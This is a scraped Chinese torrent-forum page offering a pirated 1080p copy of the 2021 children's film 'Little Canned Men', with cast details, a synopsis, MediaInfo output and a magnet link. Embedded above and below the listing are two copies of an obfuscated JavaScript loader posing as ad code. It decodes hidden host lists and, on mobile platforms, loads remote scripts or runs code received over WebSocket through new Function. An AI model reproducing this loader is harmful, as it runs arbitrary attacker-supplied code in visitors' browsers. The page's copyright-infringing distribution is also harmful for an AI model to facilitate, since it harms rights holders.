皮皮鲁与鲁西西之罐头小人[国语配音/中文字幕].Little.Canned.Men.2021.1080p.WEB-DL.H264.DDP2.0-bt9527.cc 1.06GB

版主小s 13天前 284

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译  名 皮皮鲁与鲁西西之罐头小人 / 皮皮鲁总动员之罐头小人 / 皮皮鲁和罐头小人 / 罐头小人 / Little Canned Men
◎年  代 2021
◎产  地 中国大陆
◎类  别 喜剧 / 儿童 / 奇幻
◎语  言 汉语普通话
◎上映日期 2021-09-30(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt15547890/
◎豆瓣评分 7.0/10 (6347人评价)
◎豆瓣链接 https://movie.douban.com/subject/33973077/
◎片  长 94分钟
◎导  演 于飞 Fei Yu (id:1336721)
◎编  剧 于飞 Fei Yu (id:1336721)
       郑渊洁 Yuanjie Zheng (id:1318434)
◎演  员 洪悦熙 Yuexi Hong (id:1451469)
       庄则熙 Zexi Zhuang (id:1400046)
       田雨 Yu Tian (id:1316331)
       刘一莹 Yiying Liu (id:1318030)
       于书瑶 Shuyao Yu (id:1396540)
       温淳棣 Chundi Wen (id:1408815)
       刘向卿 Xiangqing Liu (id:1451470)
       李淏东 HaoDong Li (id:1392638)
       朱近桐 Jintong Zhu (id:1425133)
       白瑶 Yao Bai (id:1339731)
       郑渊洁 Yuanjie Zheng (id:1318434)

◎标  签 儿童 / 童话改编 / 罐头小人 / 童话 / 奇幻 / 中国大陆 / 2021 / 喜剧

◎简  介
  皮皮鲁和鲁西西是一对双胞胎兄妹,鲁西西成绩优异,皮皮鲁调皮贪玩。有一天鲁西西在家里发现了一个奇怪的罐头,罐头里面出现了五个只有火柴棍高的小人,鲁西西给他们分别起名博士、上尉、艺术家、歌唱家、外交官。皮皮鲁与鲁西西这对兄妹在结识了五位罐头小人后,使他们的学习和生活发生了翻天覆地的变化,开启了一系列奇幻冒险趣事。

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 145478225677846685033035123910573365792 (0x6D72164CC550D216B288DA99D0DD1A20)
  4. Complete name                            : 皮皮鲁与鲁西西之罐头小人[email protected]M.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 1.06 GiB
  8. Duration                                 : 1 h 33 min
  9. Overall bit rate                         : 1 608 kb/s
  10. Encoded date                             : UTC 2021-11-18 08:18:17
  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 2
  15. Format                                   : AVC
  16. Format/Info                              : Advanced Video Codec
  17. Format profile                           : [email protected]
  18. Format settings                          : CABAC / 4 Ref Frames
  19. Format settings, CABAC                   : Yes
  20. Format settings, Reference frames        : 4 frames
  21. Codec ID                                 : V_MPEG4/ISO/AVC
  22. Duration                                 : 1 h 33 min
  23. Bit rate                                 : 1 351 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 812 pixels
  26. Display aspect ratio                     : 2.35:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 8 bits
  32. Scan type                                : Progressive
  33. Bits/(Pixel*Frame)                       : 0.036
  34. Stream size                              : 908 MiB (84%)
  35. Writing library                          : ptw-1.0.137 rcm-adapt vs-93 vwk
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Color range                              : Limited
  39. Color primaries                          : BT.709
  40. Transfer characteristics                 : BT.709
  41. Matrix coefficients                      : BT.709
  42. Audio
  43. ID                                       : 1
  44. Format                                   : E-AC-3
  45. Format/Info                              : Enhanced AC-3
  46. Commercial name                          : Dolby Digital Plus
  47. Codec ID                                 : A_EAC3
  48. Duration                                 : 1 h 33 min
  49. Bit rate mode                            : Constant
  50. Bit rate                                 : 256 kb/s
  51. Channel(s)                               : 2 channels
  52. Channel layout                           : L R
  53. Sampling rate                            : 48.0 kHz
  54. Frame rate                               : 31.250 FPS (1536 SPF)
  55. Compression mode                         : Lossy
  56. Stream size                              : 172 MiB (16%)
  57. Service kind                             : Complete Main
  58. Default                                  : Yes
  59. Forced                                   : No
复制代码




TAGS 奇幻 喜剧 儿童

磁力链:
  • magnet:?xt=urn:btih:9CB1845F6D8069254786A8A68E1BE3EBE352BD63

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};